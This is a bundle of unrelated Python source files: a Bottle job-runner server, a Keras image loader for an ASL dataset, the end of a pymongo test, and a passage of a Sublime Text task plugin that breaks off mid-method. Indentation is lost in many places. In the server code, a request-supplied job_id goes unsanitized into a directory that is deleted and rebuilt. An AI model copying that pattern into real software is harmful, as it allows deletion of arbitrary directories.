'$and': [
{'i': {'$gt': -100}},
{'i': {'$lt': 2}},
]
},
]
})]
)
def test_find_regex(self):
c = self.db.test
c.drop()
c.insert_one({'r': re.compile('.*')})
self.assertTrue(isinstance(c.find_one()['r'], Regex))
for doc in c.find():
self.assertTrue(isinstance(doc['r'], Regex))
def test_find_command_generation(self):
cmd = _gen_find_command(
'coll', {'$query': {'foo': 1}, '$dumb': 2}, None, 0, 0, 0, None)
self.assertEqual(
cmd.to_dict(),
SON([('find', 'coll'),
('$dumb', 2),
('filter', {'foo': 1})]).to_dict())
if __name__ == "__main__":
unittest.main()
|
jobs.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle, request, template, abort, static_file
import os
import uuid
import sh
import json
import yaml
from datetime import datetime
import time
import threading
import functools
import psutil
import shutil
import adb
app = Bottle()
app.config.setdefault('jobs.path', '/home/pi/jobs')
app.config.setdefault('jobs.init_script', '.init.yml')
jobs = []  # jobs are kept in process memory, so exactly ONE app instance must be running.
_lock = threading.Lock()
def lock(fn):
    # Serialize access to the shared in-memory ``jobs`` list across handlers.
    @functools.wraps(fn)
    def wrapper(*args, **kwargs):
        with _lock:  # equivalent to acquire()/try/finally-release()
            return fn(*args, **kwargs)
    return wrapper
@app.get("/")
@lock
def all_jobs():
global jobs
job_path = app.config.get('jobs.path')
reverse = get_boolean(request.params.get('reverse', 'false'))
all = get_boolean(request.params.get('all', 'false'))
result = {}
if all:
result['all'] = []
for dirname in os.listdir(job_path):
json_file = os.path.join(job_path, dirname, 'job.json')
if os.path.isfile(json_file):
with open(json_file) as f:
result['all'].append(json.load(f))
result['jobs'] = [job['job_info'] for job in jobs]
for key in result: # sort
result[key] = sorted(result[key], key=lambda x: float(x['started_at']), reverse=reverse)
return result
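# Example (hypothetical host): GET /?all=true&reverse=true returns
# {'all': [...saved job.json records...], 'jobs': [...running jobs...]},
# each list sorted by its float 'started_at' timestamp.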
@app.post("/")
def create_job_without_id():
job_id = request.params.get("job_id") if "job_id" in request.params else next_job_id()
return create_job(job_id, "%s/%s" % (refine_url(request.url), job_id))
@app.post("/<job_id>")
def create_job_with_id(job_id):
return create_job(job_id, refine_url(request.url))
@lock
def create_job(job_id, job_url):
repo = request.json.get('repo')
if repo is None:
abort(400, 'The "repo" is mandatory for creating a new job!')
exclusive = get_boolean(request.json.get('exclusive', True))
env = request.json.get('env', {})
env.setdefault('ANDROID_SERIAL', 'no_device')
global jobs
if exclusive and any(job['job_info']['env']['ANDROID_SERIAL'] == env['ANDROID_SERIAL'] and job['job_info']['exclusive'] for job in jobs):
        abort(409, 'An exclusive job is already running on the device with the same ANDROID_SERIAL!')
if env['ANDROID_SERIAL'] not in adb.devices(status='ok') and env['ANDROID_SERIAL'] != 'no_device':
abort(404, 'No specified device attached!')
if any(job['job_info']['job_id'] == job_id for job in jobs):
        abort(409, 'A job with the same job_id is running! If you want to re-run the job, please stop the running one first.')
job_path = os.path.abspath(os.path.join(app.config.get('jobs.path'), job_id))
shutil.rmtree(job_path, ignore_errors=True)
workspace = os.path.join(job_path, 'workspace')
os.makedirs(workspace) # make the working directory for the job
env.update({
'WORKSPACE': workspace,
'JOB_ID': job_id
})
filenames = ['repo', 'output', 'error', 'run.sh', 'job.json']
local_repo, job_out, job_err, job_script, job_info = [os.path.join(job_path, f) for f in filenames]
with open(job_script, "w") as script_f:
script_f.write(template(
'run_script',
repo=repo,
local_repo=local_repo,
init_script='%s/init_script/%s' % (
job_url,
repo.get('init_script', request.app.config.get('jobs.init_script'))
),
env=env
))
proc = sh.bash(job_script, _out=job_out, _err=job_err, _bg=True)
timestamp = time.time()
result = {
'repo': repo,
'job_id': job_id,
'job_pid': proc.pid,
'job_path': job_path,
'env': env,
'exclusive': exclusive,
'started_at': str(timestamp),
'started_datetime': str(datetime.fromtimestamp(timestamp))
}
job = {'proc': proc, 'job_info': result}
jobs.append(job)
callback = request.json.get('callback')
def proc_clear():
@lock
def check():
global jobs
if job and job['proc'].process.alive:
return True
else:
jobs.remove(job)
                try:
                    # sh raises ErrorReturnCode on the first access to
                    # exit_code of a failed command; a second access returns
                    # the code without raising.
                    result['exit_code'] = job['proc'].exit_code
                except sh.ErrorReturnCode:
                    result['exit_code'] = job['proc'].exit_code
finally:
timestamp = time.time()
result['finished_at'] = str(timestamp)
result['finished_datetime'] = str(datetime.fromtimestamp(timestamp))
write_json(job_info, result)
                    if callback:
                        import requests  # lazy import: only needed when a callback is set
                        try:
                            requests.get(callback, params={'job_id': job_id})
                        except Exception:
                            pass  # the callback is best-effort; never crash the monitor thread
return False
while check():
time.sleep(1)
threading.Thread(target=proc_clear).start()
write_json(job_info, result)
return result
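# A minimal request body for POST / (illustrative values, not taken from
# the original source):
#
#   {
#     "repo": {"url": "https://example.com/project.git"},
#     "env": {"ANDROID_SERIAL": "emulator-5554"},
#     "exclusive": true,
#     "callback": "http://example.com/notify"
#   }
#
# The response echoes the job record: job_id, job_pid, job_path, env and
# the start timestamps.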
@app.get("/<job_id>/init_script/<script_name>")
def init_script(job_id, script_name):
return get_init_script(job_id, script_name)
@app.get("/<job_id>/init_script")
def default_init_script(job_id):
return get_init_script(job_id, request.app.config.get('jobs.init_script'))
def get_init_script(job_id, script_name):
init_script = os.path.abspath(os.path.join(app.config.get('jobs.path'), job_id, 'repo', script_name))
with open(init_script, 'r') as f:
        init_json = yaml.safe_load(f.read())  # safe_load: never execute arbitrary YAML tags from a repo
return template('init_script', init=init_json)
@app.delete("/<job_id>")
@app.get("/<job_id>/stop")
@lock
def terminate_job(job_id):
global jobs
for job in jobs:
if job['job_info']['job_id'] == job_id:
kill_process_and_children(job['job_info']['job_pid'])
break
else:
abort(410, 'The requested job is already dead!')
@app.get("/<job_id>")
def job_info(job_id):
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
return static_file('job.json', root=job_path)
@app.get("/<job_id>/stream")
def output(job_id):
lines = int(request.params.get('lines', 40))
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
job_out = os.path.join(job_path, 'output')
job_info = os.path.join(job_path, 'job.json')
if not os.path.exists(job_out) or not os.path.exists(job_info):
        return  # PEP 479: raising StopIteration inside a generator becomes RuntimeError in Python 3.7+
with open(job_info) as f:
info = json.load(f)
args = ['--lines=%d' % lines, job_out] if "exit_code" in info else ['--lines=%d' % lines, '--pid=%d' % info['job_pid'], '-f', job_out]
for line in sh.tail(*args, _iter=True):
yield line
@app.get("/<job_id>/files/<path:path>")
def download_file(job_id, path):
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
if os.path.isdir(os.path.join(job_path, path)):
return {'files': list_dir(os.path.join(job_path, path))}
else:
return static_file(path, root=job_path)
@app.get("/<job_id>/files")
@app.get("/<job_id>/files/")
def list_files(job_id):
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
if not os.path.exists(job_path):
        abort(404, 'Oh, no! The requested path does not exist!')
return {'files': list_dir(job_path)}
@app.delete("/<job_id>/files")
@app.get("/<job_id>/remove_files")
@lock
def delete_file(job_id):
global jobs
jobs_path = app.config.get('jobs.path')
job_path = os.path.abspath(os.path.join(jobs_path, job_id))
if any(job_id == job['job_info']['job_id'] for job in jobs):
abort(409, 'The specified job is running!')
elif not os.path.exists(job_path):
abort(400, 'No specified job!')
shutil.rmtree(job_path, ignore_errors=True)
def refine_url(url):
if '?' in url:
url = url[:url.find('?')]
if url[-1] == '/':
url = url[:-1]
return url
def kill_process_and_children(pid):
parent = psutil.Process(pid)
if parent.is_running():
        for child in parent.children(recursive=True):  # psutil 2.x+ API (get_children was removed)
if child.is_running():
child.terminate()
parent.terminate()
def next_job_id():
return str(uuid.uuid1())
def get_boolean(param):
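    # JSON booleans pass through unchanged; for strings and ints, anything other
    # than 'false', 'False', '0' and 0 counts as True (e.g. 'yes' -> True)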
return param if isinstance(param, bool) else param not in ['false', '0', 0, 'False']
def write_json(filename, obj):
with open(filename, 'w') as info_f:
info_f.write(json.dumps(obj, sort_keys=True, indent=2))
def list_dir(path):
if not os.path.exists(path) or not os.path.isdir(path):
return None
result = []
for f in os.listdir(path):
filename = os.path.join(path, f)
stat = os.stat(filename)
result.append({
'name': f,
'is_dir': os.path.isdir(filename),
'create_time': stat.st_ctime,
'modify_time': stat.st_mtime,
'size': stat.st_size
})
return result
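

# Illustrative client sketch (not part of the server): how a caller could start a
# job and poll its info through the endpoints above. The base URL and the shape
# of the "repo" payload are assumptions for demonstration only.
def _example_client(base_url='http://localhost:8080'):
    import requests
    payload = {
        'repo': {'url': 'https://example.com/some/repo.git'},  # hypothetical repo descriptor
        'env': {'ANDROID_SERIAL': 'no_device'},
        'exclusive': False,
    }
    created = requests.post(base_url + '/', json=payload).json()
    # job.json is written when the job starts and updated again when it finishes
    return requests.get('%s/%s' % (base_url, created['job_id'])).json()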
|
img_loader.py
|
from keras.preprocessing import image
import sklearn.utils as skutils
from enum import Enum
import os
import numpy as np
import psutil
from threading import Thread
import math
from matplotlib import pyplot as plt
#################################################################################
# README #
#################################################################################
# Please make sure to have the two folders asl_alphabet_test & asl_alphabet_train
# under a parent directory named dataset in the root of the project
# It will not be synchronized to github due to its size (approx 1GB)
# ABSOLUTE PATH OF THIS FILE
dir_path = os.path.dirname(os.path.realpath(__file__))
# Default parameters. Do not edit unless sure of what you are doing.
bpath_def = '../../../dataset/'
trpath_def = 'asl_alphabet_train/'
tspath_def = 'asl_alphabet_test/'
classes_def = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'del', 'nothing', 'space']
class DatasetParserMode(Enum):
"""
This enumeration is used to provide elegant logic in the parser and iterator implementations
    You should not make direct use of it unless you are absolutely sure of what you are doing
"""
PATH_BASED = 0
CLASS_BASED = 1
class DatasetParser:
"""
This class provides parsing functionality for the dataset
    It is capable of splitting the available data into training and testing sets in a very fast and efficient way
It has two modes of operation: single thread and multi thread
    We strongly advise you to run it in the default mode (multithreaded) for performance reasons
    In single-threaded mode it will take roughly 10x longer, since JPEG -> RGB decoding is slow and creates a lot of overhead
    Note that 1GB of JPEG data expands to more than 10GB of RAM & swap once decoded to raw RGB arrays.
Note 1: Multi threading will provide a HUGE boost, use it.
Note 2: The parser will spawn a number of threads equal to the number of logical CPUs available on your machine
:param multithread: Defines how the parser operates, we advise to leave this parameter to on
:param maxthreads: Specify the max number of threads that will be created
:param basepath: Leave default value unless you want to feed a different dataset base URL
:param trainingpath: Training set URL relative to basepath.
Leave default value unless you want to feed a different training dataset URL
:param testingpath: Testing set URL relative to basepath.
Leave default value unless you want to feed a different testing base URL
:param verbose: I hope you understood what this is here for :)
"""
def __init__(self,
multithread=True,
maxthreads=psutil.cpu_count(),
basepath=bpath_def,
trainingpath=trpath_def,
testingpath=tspath_def,
verbose=True,
):
self.tr_path = os.path.join(dir_path, basepath, trainingpath)
self.ts_path = os.path.join(dir_path, basepath, testingpath)
self.multithread = multithread
self.maxthreads = maxthreads
self.verbose = verbose
# This method creates objects to handle and operate the multi threaded parsing infrastructure.
# It should be called just by the class itself
def _multithread_splitter(self, n):
nthreads = min(n, self.maxthreads)
work_size = math.floor(n / nthreads)
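        # e.g. n=29 classes with maxthreads=8 -> nthreads=8, work_size=3; the
        # calling loops hand the remainder (here 8 items) to the last thread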
threads = [None] * nthreads
results = [[[], []] for _ in range(nthreads)]
if self.verbose:
print('Multithread parsing is on.')
print('Available number of logical CPUs = %s, maximum number of threads set to = %s'
% (psutil.cpu_count(), self.maxthreads))
return nthreads, work_size, threads, results
# This method fetches a set of images from a set of class labels.
# This method is not used by the iterator since the fetch is not based on URLs but on class names.
def _subroutine_fetch_tr(self, selected, results=None):
x = results[0] if self.multithread else []
y = results[1] if self.multithread else []
for c in selected:
for sample in os.listdir(self.tr_path + c):
path = self.tr_path + c + '/' + sample
img_vect = self.img2array(path)
x.append(img_vect)
y.append([1 if c_ == c else 0 for c_ in classes_def])
if self.verbose:
print('Update: %s parsed' % c)
return x, y
# This method fetches a set of images from a set of URLs, usually provided by the iterator class.
def _subroutine_fetch_paths(self, paths, classes, results=None):
x = results[0]
y = results[1]
for idx, path in enumerate(paths):
img_vect = self.img2array(path)
x.append(img_vect)
y.append([1 if c_ == classes[idx] else 0 for c_ in classes_def])
        return x, y  # the results list is also mutated in place when called from worker threads
def fetch_tr(self, mode=DatasetParserMode.CLASS_BASED, *args):
"""
This method creates the vector representation of the dataset.
It is modular in that it can be called directly by the user or by the iterator
Without an iterator class, this method will merely return all the parsed images from the specified classes
No shuffling will be performed when called directly
Direct call by the user
:param mode: should always be set to DatasetParserMode.CLASS_BASED.
:param args: A sequence of classes that will make up the final result vector,
if set to, say, "A", "B", "C", the method will return images and labels for those classes only. (No shuffle)
Call by the iterator
Do not try to emulate the iterator with a direct call unless sure of what you are doing
:param mode: should always be set to DatasetParserMode.PATH_BASED.
:param args: A pair of paths/classes that will be parsed and returned in the final result
:return x: The vector representation of all the images, each has shape 200x200x3. x shape varies
:return y: The vector representation of all the classes corresponding to the images. y shape varies
"""
selected = []
if mode == DatasetParserMode.PATH_BASED:
nthreads, work_size, threads, results = self._multithread_splitter(len(args[0][1]))
if self.verbose:
print('Splitting load across %s threads..' % nthreads)
for idx in range(nthreads):
if idx + 1 != nthreads:
paths_arg = args[0][0][idx * work_size: idx * work_size + work_size]
classes_arg = args[0][1][idx * work_size: idx * work_size + work_size]
else:
paths_arg = args[0][0][idx * work_size:]
classes_arg = args[0][1][idx * work_size:]
if self.verbose:
print('Thread %s -> %s paths' % (idx, len(paths_arg)))
threads[idx] = Thread(target=self._subroutine_fetch_paths, args=(paths_arg, classes_arg, results[idx]))
threads[idx].start()
if self.verbose:
print('Suspending main thread until all other threads have finished.')
for idx in range(len(threads)):
threads[idx].join()
if self.verbose:
print('Thread %s has done parsing..' % idx)
if self.verbose:
print('All threads have finished parsing.. Combining results..')
x, y = [], []
for result in results:
for i in range(len(result[0])):
x.append(result[0][i])
y.append(result[1][i])
return np.array(x), np.array(y)
else:
# Check user input and update selection
if len(args) > 0:
for c in args:
                    selected.append(c.upper() if len(c) == 1 else c)
else:
selected = classes_def
if self.multithread:
nthreads, work_size, threads, results = self._multithread_splitter(len(selected))
if self.verbose:
print('Splitting load across %s threads..' % nthreads)
for idx in range(nthreads):
if idx + 1 != nthreads:
arg = selected[idx * work_size: idx * work_size + work_size]
else:
arg = selected[idx * work_size:]
if self.verbose:
print('Thread %s -> %s' % (idx, arg))
threads[idx] = Thread(target=self._subroutine_fetch_tr, args=(arg, results[idx]))
threads[idx].start()
if self.verbose:
print('Suspending main thread until all other threads have finished.')
for idx in range(len(threads)):
threads[idx].join()
if self.verbose:
print('Thread %s has finished.' % idx)
if self.verbose:
print('All threads have finished parsing.. Combining results..')
x, y = [], []
for result in results:
for i in range(len(result[0])):
x.append(result[0][i])
y.append(result[1][i])
return np.array(x), np.array(y)
else:
if self.verbose:
print('Multithread parsing is off')
x, y = self._subroutine_fetch_tr(selected=selected)
return np.array(x), np.array(y)
    # Converts an image into a numpy RGB array 200x200x3
@staticmethod
def img2array(path):
img = image.load_img(path)
return image.img_to_array(img)
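# Minimal usage sketch for the parser alone (a sketch; assumes the dataset folders
# described in the README block above are in place, the class names are examples):
#
#     parser = DatasetParser(multithread=True, verbose=False)
#     x, y = parser.fetch_tr(DatasetParserMode.CLASS_BASED, 'A', 'B')
#     # x.shape == (n_images, 200, 200, 3); y rows are one-hot over classes_def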
class TrainingSetIterator:
"""
This class provides a simple way to load the dataset incrementally without
filling up your ram/swap file with 10GB of data
    This happens because the images are stored as JPEG, but decompressing them to raw RGB greatly increases their size.
HOW TO USE:
1) Instantiate specifying the used parser and the batchsize
2) Simply use it like: for x,y in instance: operate on the current batch
:param parser: Valid instance of a DatasetParser with multithread = true
    :param chunksize: The size of each batch. The total training set size must be a multiple of this number,
    since every batch must have the same size.
    :param limit: Stop iterating after this many images have been processed (None means no limit)
:param shuffle: Set it to true to shuffle the images returned in each batch
:param seed: If you want always the same batches, provide a seed for the initialization of the random algorithm
:param classes: leave empty to create batches from all the training classes, or specify your own by passing a list
"""
def __init__(self, parser, chunksize=1000, limit=None, shuffle=False, seed=None, classes=None):
self.parser = parser
self.processed = 0
self.batchsize = chunksize
self.shuffle = shuffle
self.seed = seed
self.limit = limit
self.classes = classes if classes is not None and len(classes) > 0 else classes_def
self.x, self.y = self._fetch_image_data()
# Returns the iterator for this class. You shouldn't require to call this
def get_iterator(self):
return iter(self)
# Fetches all the paths for each training images present in the dataset
# These paths will later be passed to the parser for the creation of the batch
# This method will take care of shuffling the image path and, in turn, the final batch
def _fetch_image_data(self):
x = []
y = []
print('Collecting image paths and classes..')
for c in self.classes:
            # use the parser's absolute training path so the lookup does not depend on the CWD
            elements = os.listdir(self.parser.tr_path + c)
            l = len(elements)
            x += [self.parser.tr_path + c + '/' + e for e in elements]
y += [c for _ in range(l)]
self.nimages = len(x)
print('Found %s images' % self.nimages)
print('Shuffling images..')
if self.shuffle:
x, y = skutils.shuffle(x, y, random_state=self.seed)
if self.nimages % self.batchsize != 0:
raise Exception('The training set size is not a multiple of the'
' batch size! Batch size can only be one of these values:\n%s'
% self.available_batchsizes(self.nimages)
)
return x, y
# This method should not be called directly but by the class itself only.
# It creates the next batch of path/class pairs that will be processed by the parser
def _get_next_batch(self):
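        # pop() consumes paths from the end of the (possibly shuffled) list, one batch per call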
ret_x, ret_y = [], []
for _ in range(self.batchsize):
ret_x.append(self.x.pop())
ret_y.append(self.y.pop())
return ret_x, ret_y
# This method is required to implement the iterator interface
def __iter__(self):
return self
# This method is required to implement the iterator interface
# It will provide the next batch as a x/y pair of numpy arrays
    # It is intended to be used within for loops, as shown in the class docstring
# This method will pass the current batch of url/class pairs to the parser and will
# return the image/class vector pairs
def __next__(self):
if self.processed < self.nimages:
if self.limit is not None and self.processed >= self.limit:
raise StopIteration
self.currentbatch = self._get_next_batch()
self.currentbatch = self.parser.fetch_tr(DatasetParserMode.PATH_BASED,
[self.currentbatch[0], self.currentbatch[1]])
self.processed += self.batchsize
return self.currentbatch
else:
raise StopIteration
@staticmethod
def available_batchsizes(x):
        # Returns the factors of x, one per line, as a string (used in the batch-size error message)
v = ''
for i in range(1, x + 1):
if x % i == 0:
v += str(i) + '\n'
return v
"""
After various tests, batch sizes around 4350 should be fine;
otherwise keep it less than or equal to that.
ds_parser = DatasetParser(verbose=True)
training_set = TrainingSetIterator(parser=ds_parser, shuffle=True, chunksize=3625, seed=None)
for x, y in training_set:
print('Printing the first image of this new batch..')
print('The class vector corresponding to the first image is..')
for i in range(10):
plt.imshow(x[i] / 255.)
print(y[i])
plt.show()
"""
|
PlainTasks.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sublime, sublime_plugin
import os
import re
import webbrowser
import itertools
import threading
from datetime import datetime, tzinfo, timedelta
import time
platform = sublime.platform()
ST3 = int(sublime.version()) >= 3000
if ST3:
from .APlainTasksCommon import PlainTasksBase, PlainTasksFold, get_all_projects_and_separators
else:
from APlainTasksCommon import PlainTasksBase, PlainTasksFold, get_all_projects_and_separators
sublime_plugin.ViewEventListener = object
# io is not operable in ST2 on Linux, but in all other cases io is better
# https://github.com/SublimeTextIssues/Core/issues/254
if not ST3 and platform == 'linux':
import codecs as io
else:
import io
NT = platform == 'windows'
if NT:
import subprocess
if ST3:
from datetime import timezone
else:
class timezone(tzinfo):
__slots__ = ("_offset", "_name")
def __init__(self, offset, name=None):
if not isinstance(offset, timedelta):
raise TypeError("offset must be a timedelta")
self._offset = offset
self._name = name
def utcoffset(self, dt):
return self._offset
def tzname(self, dt):
return self._name
def dst(self, dt):
return timedelta(0)
def tznow():
t = time.time()
d = datetime.fromtimestamp(t)
u = datetime.utcfromtimestamp(t)
return d.replace(tzinfo=timezone(d - u))
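# tznow() is a tz-aware drop-in for datetime.now(); e.g. (illustrative values):
#   tznow().strftime('(%y-%m-%d %H:%M)')  ->  '(16-05-05 11:33)' in local time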
def check_parentheses(date_format, regex_group, is_date=False):
if is_date:
try:
parentheses = regex_group if datetime.strptime(regex_group.strip(), date_format) else ''
except ValueError:
parentheses = ''
else:
try:
parentheses = '' if datetime.strptime(regex_group.strip(), date_format) else regex_group
except ValueError:
parentheses = regex_group
return parentheses
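# Illustrative behaviour (a sketch assuming date_format '(%y-%m-%d %H:%M)'):
#   is_date=True keeps the group only if it parses as a date: '(16-05-05 11:33)' -> kept, 'foo' -> ''
#   is_date=False keeps the group only if it does NOT parse as a date, i.e. it is a real parenthesized note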
class PlainTasksNewCommand(PlainTasksBase):
def runCommand(self, edit):
# list for ST3 support;
# reversed because with multiple selections regions would be messed up after first iteration
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
header_to_task = self.view.settings().get('header_to_task', False)
# ST3 (3080) moves sel when call view.replace only by delta between original and
# new regions, so if sel is not in eol and we replace line with two lines,
# then cursor won’t be on next line as it should
sels = self.view.sel()
eol = None
for i, line in enumerate(regions):
line_contents = self.view.substr(line).rstrip()
not_empty_line = re.match('^(\s*)(\S.*)$', self.view.substr(line))
empty_line = re.match('^(\s+)$', self.view.substr(line))
current_scope = self.view.scope_name(line.a)
eol = line.b # need for ST3 when new content has line break
if 'item' in current_scope:
grps = not_empty_line.groups()
line_contents = self.view.substr(line) + '\n' + grps[0] + self.open_tasks_bullet + self.tasks_bullet_space
elif 'header' in current_scope and line_contents and not header_to_task:
grps = not_empty_line.groups()
line_contents = self.view.substr(line) + '\n' + grps[0] + self.before_tasks_bullet_spaces + self.open_tasks_bullet + self.tasks_bullet_space
elif 'separator' in current_scope:
grps = not_empty_line.groups()
line_contents = self.view.substr(line) + '\n' + grps[0] + self.before_tasks_bullet_spaces + self.open_tasks_bullet + self.tasks_bullet_space
            # neither a header nor a separator scope
            elif not ('header' in current_scope or 'separator' in current_scope) or header_to_task:
eol = None
if not_empty_line:
grps = not_empty_line.groups()
line_contents = (grps[0] if len(grps[0]) > 0 else self.before_tasks_bullet_spaces) + self.open_tasks_bullet + self.tasks_bullet_space + grps[1]
elif empty_line: # only whitespaces
grps = empty_line.groups()
line_contents = grps[0] + self.open_tasks_bullet + self.tasks_bullet_space
else: # completely empty, no whitespaces
line_contents = self.before_tasks_bullet_spaces + self.open_tasks_bullet + self.tasks_bullet_space
else:
print('oops, need to improve PlainTasksNewCommand')
if eol:
# move cursor to eol of original line, workaround for ST3
sels.subtract(sels[~i])
sels.add(sublime.Region(eol, eol))
self.view.replace(edit, line, line_contents)
# convert each selection to single cursor, ready to type
new_selections = []
for sel in list(self.view.sel()):
eol = self.view.line(sel).b
new_selections.append(sublime.Region(eol, eol))
self.view.sel().clear()
for sel in new_selections:
self.view.sel().add(sel)
PlainTasksStatsStatus.set_stats(self.view)
self.view.run_command('plain_tasks_toggle_highlight_past_due')
class PlainTasksNewWithDateCommand(PlainTasksBase):
def runCommand(self, edit):
self.view.run_command('plain_tasks_new')
sels = list(self.view.sel())
suffix = ' @created%s' % tznow().strftime(self.date_format)
points = []
for s in reversed(sels):
if self.view.substr(sublime.Region(s.b - 2, s.b)) == ' ':
point = s.b - 2 # keep double whitespace at eol
else:
point = s.b
self.view.insert(edit, point, suffix)
points.append(point)
self.view.sel().clear()
offset = len(suffix)
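        # sels were visited in reverse, so points[~i] is the insertion point of the i-th
        # selection in document order; each earlier insertion shifts it by i*len(suffix)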
for i, sel in enumerate(sels):
self.view.sel().add(sublime.Region(points[~i] + i*offset, points[~i] + i*offset))
class PlainTasksCompleteCommand(PlainTasksBase):
def runCommand(self, edit):
original = [r for r in self.view.sel()]
done_line_end, now = self.format_line_end(self.done_tag, tznow())
offset = len(done_line_end)
rom = r'^(\s*)(\[\s\]|.)(\s*.*)$'
rdm = r'''
(?x)^(\s*)(\[x\]|.) # 0,1 indent & bullet
(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*) # 2 very task
(?=
((?:\s@done|@project|@[wl]asted|$).*) # 3 ending either w/ done or w/o it & no date
| # or
(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$ # 4 date & possible project tag after
)
''' # rcm is the same, except bullet & ending
rcm = r'^(\s*)(\[\-\]|.)(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*)(?=((?:\s@cancelled|@project|@[wl]asted|$).*)|(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$)'
started = r'^\s*[^\b]*?\s*@started(\([\d\w,\.:\-\/ @]*\)).*$'
toggle = r'@toggle(\([\d\w,\.:\-\/ @]*\))'
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
for line in regions:
line_contents = self.view.substr(line)
open_matches = re.match(rom, line_contents, re.U)
done_matches = re.match(rdm, line_contents, re.U)
canc_matches = re.match(rcm, line_contents, re.U)
started_matches = re.findall(started, line_contents, re.U)
toggle_matches = re.findall(toggle, line_contents, re.U)
done_line_end = done_line_end.rstrip()
if line_contents.endswith(' '):
done_line_end += ' ' # keep double whitespace at eol
dblspc = ' '
else:
dblspc = ''
current_scope = self.view.scope_name(line.a)
if 'pending' in current_scope:
grps = open_matches.groups()
len_dle = self.view.insert(edit, line.end(), done_line_end)
replacement = u'%s%s%s' % (grps[0], self.done_tasks_bullet, grps[2].rstrip())
self.view.replace(edit, line, replacement)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.a + len(replacement) + len_dle}
)
elif 'header' in current_scope:
eol = self.view.insert(edit, line.end(), done_line_end)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.end() + eol}
)
indent = re.match('^(\s*)\S', line_contents, re.U)
self.view.insert(edit, line.begin() + len(indent.group(1)), '%s ' % self.done_tasks_bullet)
self.view.run_command('plain_tasks_calculate_total_time_for_project', {'start': line.a})
elif 'completed' in current_scope:
grps = done_matches.groups()
parentheses = check_parentheses(self.date_format, grps[4] or '')
replacement = u'%s%s%s%s' % (grps[0], self.open_tasks_bullet, grps[2], parentheses)
self.view.replace(edit, line, replacement.rstrip() + dblspc)
offset = -offset
elif 'cancelled' in current_scope:
grps = canc_matches.groups()
len_dle = self.view.insert(edit, line.end(), done_line_end)
parentheses = check_parentheses(self.date_format, grps[4] or '')
replacement = u'%s%s%s%s' % (grps[0], self.done_tasks_bullet, grps[2], parentheses)
self.view.replace(edit, line, replacement.rstrip())
offset = -offset
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.a + len(replacement) + len_dle}
)
self.view.sel().clear()
for ind, pt in enumerate(original):
ofs = ind * offset
new_pt = sublime.Region(pt.a + ofs, pt.b + ofs)
self.view.sel().add(new_pt)
PlainTasksStatsStatus.set_stats(self.view)
self.view.run_command('plain_tasks_toggle_highlight_past_due')
class PlainTasksCancelCommand(PlainTasksBase):
def runCommand(self, edit):
original = [r for r in self.view.sel()]
canc_line_end, now = self.format_line_end(self.canc_tag, tznow())
offset = len(canc_line_end)
rom = r'^(\s*)(\[\s\]|.)(\s*.*)$'
rdm = r'^(\s*)(\[x\]|.)(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*)(?=((?:\s@done|@project|@[wl]asted|$).*)|(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$)'
rcm = r'^(\s*)(\[\-\]|.)(\s*[^\b]*?(?:[^\@]|(?<!\s)\@|\@(?=\s))*?\s*)(?=((?:\s@cancelled|@project|@[wl]asted|$).*)|(?:[ \t](\([^()]*\))\s*([^@]*|(?:@project|@[wl]asted).*))?$)'
started = r'^\s*[^\b]*?\s*@started(\([\d\w,\.:\-\/ @]*\)).*$'
toggle = r'@toggle(\([\d\w,\.:\-\/ @]*\))'
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
for line in regions:
line_contents = self.view.substr(line)
open_matches = re.match(rom, line_contents, re.U)
done_matches = re.match(rdm, line_contents, re.U)
canc_matches = re.match(rcm, line_contents, re.U)
started_matches = re.findall(started, line_contents, re.U)
toggle_matches = re.findall(toggle, line_contents, re.U)
canc_line_end = canc_line_end.rstrip()
if line_contents.endswith(' '):
canc_line_end += ' ' # keep double whitespace at eol
dblspc = ' '
else:
dblspc = ''
current_scope = self.view.scope_name(line.a)
if 'pending' in current_scope:
grps = open_matches.groups()
len_cle = self.view.insert(edit, line.end(), canc_line_end)
replacement = u'%s%s%s' % (grps[0], self.canc_tasks_bullet, grps[2].rstrip())
self.view.replace(edit, line, replacement)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.a + len(replacement) + len_cle,
'tag': 'wasted'}
)
elif 'header' in current_scope:
eol = self.view.insert(edit, line.end(), canc_line_end)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.end() + eol,
'tag': 'wasted'}
)
indent = re.match('^(\s*)\S', line_contents, re.U)
self.view.insert(edit, line.begin() + len(indent.group(1)), '%s ' % self.canc_tasks_bullet)
self.view.run_command('plain_tasks_calculate_total_time_for_project', {'start': line.a})
elif 'completed' in current_scope:
                sublime.status_message('You cannot cancel what has been done, can you?')
# grps = done_matches.groups()
